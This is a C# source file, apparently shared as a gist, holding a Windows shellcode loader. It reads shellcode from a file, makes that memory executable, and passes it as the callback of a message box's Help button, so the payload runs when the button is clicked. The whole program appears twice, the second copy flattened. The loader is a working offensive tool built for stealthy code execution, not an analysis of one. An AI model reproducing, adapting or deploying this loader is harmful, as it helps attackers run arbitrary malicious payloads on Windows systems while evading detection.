rmusser01/mboxexecute.cs

## mboxexecute.cs
//Compile: PS C:\> C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe .\mboxexecute.cs
//Usage: PS C:\> .\mboxexecute.exe <path to shellcode>

//References:
// https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-messageboxindirecta
// https://docs.microsoft.com/en-us/windows/win32/api/winuser/ns-winuser-msgboxparamsa


using System;
using System.IO;
using System.Runtime.InteropServices;

namespace mboxexecute
{
    class Program
    {
        static void Main(string[] args)
        {
            if (args.Length == 0)
            {
                Console.WriteLine("\n[*] Specify the filepath to shellcode.\n");
                Environment.Exit(0);
            }
            byte[] payload = File.ReadAllBytes(args[0]);
            GCHandle pinnedPayload = GCHandle.Alloc(payload, GCHandleType.Pinned);

            uint oldProtect = 0;
            if (VirtualProtectEx(GetCurrentProcess(), pinnedPayload.AddrOfPinnedObject(), (UIntPtr)payload.Length, 0x20/*RX*/, out oldProtect))
            {

                MSGBOXPARAMS boxParams = new MSGBOXPARAMS();
                boxParams.dwStyle = (uint)(0x00004000L); // Should have an ok button and a help button
                boxParams.lpfnMsgBoxCallback = pinnedPayload.AddrOfPinnedObject(); // "A pointer to the callback function that processes help events for the message box." *chef's kiss*
                boxParams.cbSize = (uint)Marshal.SizeOf(boxParams);

                int mboxResponse;
                do
                {
                    mboxResponse = MessageBoxIndirect(boxParams);
                } while (mboxResponse == 1); // Just keep looping until the user clicks "help"

                Environment.Exit(0);
            }
            else
            {
                Console.WriteLine(" [!] VirtualProtectEx failed.");
            }
        }

        [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]
        public static extern int MessageBoxIndirect(MSGBOXPARAMS lbmp);

        [DllImport("kernel32.dll")]
        static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern IntPtr GetCurrentProcess();

        [StructLayout(LayoutKind.Sequential)]
        public struct MSGBOXPARAMS
        {
            public uint cbSize;
            public IntPtr hwndOwner;
            public IntPtr hInstance;
            public string lpszText;
            public string lpszCaption;
            public uint dwStyle;
            public IntPtr lpszIcon;
            public IntPtr dwContextHelpId;
            public IntPtr lpfnMsgBoxCallback;
            public uint dwLanguageId;
        }
    }
}
	//Compile: PS C:\> C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe .\mboxexecute.cs
	//Usage: PS C:\> .\mboxexecute.exe <path to shellcode>

	//References:
	// https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-messageboxindirecta
	// https://docs.microsoft.com/en-us/windows/win32/api/winuser/ns-winuser-msgboxparamsa


	using System;
	using System.IO;
	using System.Runtime.InteropServices;

	namespace mboxexecute
	{
	class Program
	{
	static void Main(string[] args)
	{
	if (args.Length == 0)
	{
	Console.WriteLine("\n[*] Specify the filepath to shellcode.\n");
	Environment.Exit(0);
	}
	byte[] payload = File.ReadAllBytes(args[0]);
	GCHandle pinnedPayload = GCHandle.Alloc(payload, GCHandleType.Pinned);

	uint oldProtect = 0;
	if (VirtualProtectEx(GetCurrentProcess(), pinnedPayload.AddrOfPinnedObject(), (UIntPtr)payload.Length, 0x20/RX/, out oldProtect))
	{

	MSGBOXPARAMS boxParams = new MSGBOXPARAMS();
	boxParams.dwStyle = (uint)(0x00004000L); // Should have an ok button and a help button
	boxParams.lpfnMsgBoxCallback = pinnedPayload.AddrOfPinnedObject(); // "A pointer to the callback function that processes help events for the message box." chef's kiss
	boxParams.cbSize = (uint)Marshal.SizeOf(boxParams);

	int mboxResponse;
	do
	{
	mboxResponse = MessageBoxIndirect(boxParams);
	} while (mboxResponse == 1); // Just keep looping until the user clicks "help"

	Environment.Exit(0);
	}
	else
	{
	Console.WriteLine(" [!] VirtualProtectEx failed.");
	}
	}

	[DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]
	public static extern int MessageBoxIndirect(MSGBOXPARAMS lbmp);

	[DllImport("kernel32.dll")]
	static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

	[DllImport("kernel32.dll", SetLastError = true)]
	public static extern IntPtr GetCurrentProcess();

	[StructLayout(LayoutKind.Sequential)]
	public struct MSGBOXPARAMS
	{
	public uint cbSize;
	public IntPtr hwndOwner;
	public IntPtr hInstance;
	public string lpszText;
	public string lpszCaption;
	public uint dwStyle;
	public IntPtr lpszIcon;
	public IntPtr dwContextHelpId;
	public IntPtr lpfnMsgBoxCallback;
	public uint dwLanguageId;
	}
	}
	}